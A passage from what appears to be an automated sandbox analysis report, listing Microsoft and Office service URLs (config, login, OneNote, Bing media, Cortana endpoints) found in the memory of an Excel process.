https://clients.config.office.net/user/v1.0/iosU
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cortana.ai
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/api5
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoreGdw
      Source: EXCEL.EXE, 00000000.00000002.543306954.0000000012E40000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppqq
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia_I
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech(
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$2
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$c
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%3
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-R
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/f
      Source: EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize018
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1g
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize52
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize63
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize80=
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;Wm
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=Uo
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeAT#
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCR%
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeEfq
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeIee
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJbd
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK2b
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeM0
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOV
